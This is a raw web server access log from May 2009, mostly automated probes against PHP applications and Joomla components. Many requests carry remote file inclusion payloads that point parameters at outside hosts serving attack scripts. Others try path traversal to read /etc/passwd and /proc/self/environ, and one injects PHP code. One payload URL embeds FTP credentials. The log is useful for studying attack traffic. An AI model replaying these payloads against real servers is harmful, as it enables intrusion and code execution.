116.36.213.166 - - [28/May/2009:02:20:51 -0500] "GET /logs/index.php?conteudo=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:02:20:51 -0500] "GET /logs/access_log.1239408000/index.php?conteudo=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:02:20:53 -0500] "GET /logs/access_log.1240963200/index.php?conteudo=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:22:34 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:22:34 -0500] "GET /?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:22:36 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:22:50 -0500] "GET /logs/access_log.1241395200/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.70.14.90 - - [28/May/2009:02:22:59 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.79"
66.70.14.90 - - [28/May/2009:02:22:59 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.79"
158.38.152.250 - - [28/May/2009:02:24:16 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:24:20 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:24:25 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:24:26 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:24:32 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
93.190.49.2 - - [28/May/2009:02:24:41 -0500] "GET /logs/index.php?pagina=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
93.190.49.2 - - [28/May/2009:02:24:41 -0500] "GET /index.php?pagina=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
93.190.49.2 - - [28/May/2009:02:24:41 -0500] "GET /logs/access_log.1239494400/index.php?pagina=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:02:24:46 -0500] "GET //index.php?AML_opensite=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:02:24:46 -0500] "GET /logs//index.php?AML_opensite=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:02:24:59 -0500] "GET /logs/access_log.1238112000//index.php?AML_opensite=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.164.18 - - [28/May/2009:02:25:20 -0500] "GET /logs//include/write.php?dir=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
74.52.164.18 - - [28/May/2009:02:25:29 -0500] "GET /logs//include/write.php?dir=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
74.52.164.18 - - [28/May/2009:02:25:29 -0500] "GET //include/write.php?dir=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
74.52.164.18 - - [28/May/2009:02:25:40 -0500] "GET //include/write.php?dir=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
61.109.245.179 - - [28/May/2009:02:26:03 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:02:26:03 -0500] "GET /logs/access_log.1233705600//modules/vwar/admin/admin.php?vwar_root=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:02:26:03 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:02:26:08 -0500] "GET //index.php?AML_opensite=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:02:26:08 -0500] "GET /logs//index.php?AML_opensite=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:02:26:08 -0500] "GET /logs/access_log.1238112000//index.php?AML_opensite=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.82.228.83 - - [28/May/2009:02:28:18 -0500] "GET /logs/access_log.1232064000//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.82.228.83 - - [28/May/2009:02:28:18 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.82.228.83 - - [28/May/2009:02:28:18 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.82.228.83 - - [28/May/2009:02:28:18 -0500] "GET /logs/access_log.1236816000//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:28:29 -0500] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:28:29 -0500] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:28:29 -0500] "GET /logs/access_log.1235606400/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:28:38 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:29:15 -0500] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:29:15 -0500] "GET /logs/access_log.1235606400/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:29:15 -0500] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:02:29:15 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:02:29:19 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:02:29:19 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:02:29:19 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:02:29:20 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
212.72.183.155 - - [28/May/2009:02:48:19 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
212.72.183.155 - - [28/May/2009:02:48:19 -0500] "GET /logs/access_log.1242432000//components/com_simpleboard/image_upload.php?sbp=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
212.72.183.155 - - [28/May/2009:02:48:19 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:02:48:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:02:48:52 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:02:48:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:02:49:08 -0500] "GET /logs/access_log.1242086400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.192 - - [28/May/2009:02:50:38 -0500] "GET /logs/access_log.1170028800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.36.213.166 - - [28/May/2009:02:59:14 -0500] "GET /home.php?index=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:02:59:14 -0500] "GET /logs/home.php?index=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:02:59:15 -0500] "GET /logs/access_log.1238025600/home.php?index=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:02:59:37 -0500] "GET /logs/access_log.1239667200/home.php?index=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.208.139 - - [28/May/2009:03:02:38 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [28/May/2009:03:02:39 -0500] "GET /logs/access_log.1200700800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [28/May/2009:03:02:39 -0500] "GET /logs/access_log.1143072000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.1.64.133 - - [28/May/2009:03:03:46 -0500] "GET ///?_zb_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 200 3246 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.1.64.133 - - [28/May/2009:03:03:47 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [28/May/2009:03:03:49 -0500] "GET ///?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3246 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:03:03:51 -0500] "GET ///?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3246 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:03:03:53 -0500] "GET /logs///?_zb_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 200 191101 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.1.64.133 - - [28/May/2009:03:03:53 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [28/May/2009:03:03:56 -0500] "GET /logs///?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 191101 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:03:03:59 -0500] "GET /logs///?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 191101 "-""XXXXXX"
66.199.250.194 - - [28/May/2009:03:04:06 -0500] "GET /logs//index.php?option=com_jreactions=§ionid=&id=&mosConfig_absolute_path=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
66.199.250.194 - - [28/May/2009:03:04:06 -0500] "GET //index.php?option=com_jreactions=§ionid=&id=&mosConfig_absolute_path=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
219.85.63.226 - - [28/May/2009:03:04:29 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:03:04:29 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:03:04:33 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:03:04:33 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
91.195.124.16 - - [28/May/2009:03:05:02 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
91.195.124.16 - - [28/May/2009:03:05:02 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 348 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
91.195.124.16 - - [28/May/2009:03:05:02 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.195.124.16 - - [28/May/2009:03:05:02 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.195.124.16 - - [28/May/2009:03:05:03 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 348 "-""XXXXXX"
91.195.124.16 - - [28/May/2009:03:05:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 343 "-""XXXXXX"
91.195.124.16 - - [28/May/2009:03:05:03 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 348 "-""XXXXXX"
91.195.124.16 - - [28/May/2009:03:05:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""XXXXXX"
66.249.65.36 - - [28/May/2009:03:08:22 -0500] "GET /_vti_cnf/?N=D HTTP/1.1" 200 676 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
89.107.184.60 - - [28/May/2009:03:08:50 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cookieez.com/image.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
89.107.184.60 - - [28/May/2009:03:08:50 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cookieez.com/image.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.808"
65.55.106.113 - - [28/May/2009:03:09:08 -0500] "GET /logs/access_log.1157587200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.107.184.60 - - [28/May/2009:03:09:25 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cookieez.com/image.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
89.107.184.60 - - [28/May/2009:03:09:26 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cookieez.com/image.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.808"
218.246.20.221 - - [28/May/2009:03:11:00 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
220.181.7.97 - - [28/May/2009:03:11:30 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.246.20.221 - - [28/May/2009:03:11:52 -0500] "GET /logs/access_log.1242518400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
218.246.20.221 - - [28/May/2009:03:11:59 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.186 - - [28/May/2009:03:15:25 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.186 - - [28/May/2009:03:16:10 -0500] "GET /logs/access_log.1189987200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.246.20.221 - - [28/May/2009:03:18:28 -0500] "GET /logs/access_log.1242172800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
66.199.250.194 - - [28/May/2009:03:18:43 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.813"
66.199.250.194 - - [28/May/2009:03:18:43 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
174.143.3.188 - - [28/May/2009:03:24:37 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/ask_password.php?dir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.143.3.188 - - [28/May/2009:03:24:37 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.143.3.188 - - [28/May/2009:03:24:37 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:03:27:12 -0500] "GET /logs/access_log.1237766400//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:03:27:12 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:03:27:12 -0500] "GET /logs/access_log.1230768000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:03:27:12 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:03:29:34 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:03:29:35 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:03:29:36 -0500] "GET /logs/access_log.1238803200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:03:29:36 -0500] "GET /logs/access_log.1238457600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.106.140 - - [28/May/2009:03:40:08 -0500] "GET /logs/access_log.1187654400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.119.103.12 - - [28/May/2009:03:41:23 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:03:41:23 -0500] "GET /?sourcedir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:03:41:24 -0500] "GET /logs/?sourcedir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:03:41:24 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:03:44:43 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:03:44:43 -0500] "GET /logs/access_log.1242432000/modules/My_eGallery/public/displayCategory.php?basepath=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:03:44:43 -0500] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:03:46:33 -0500] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
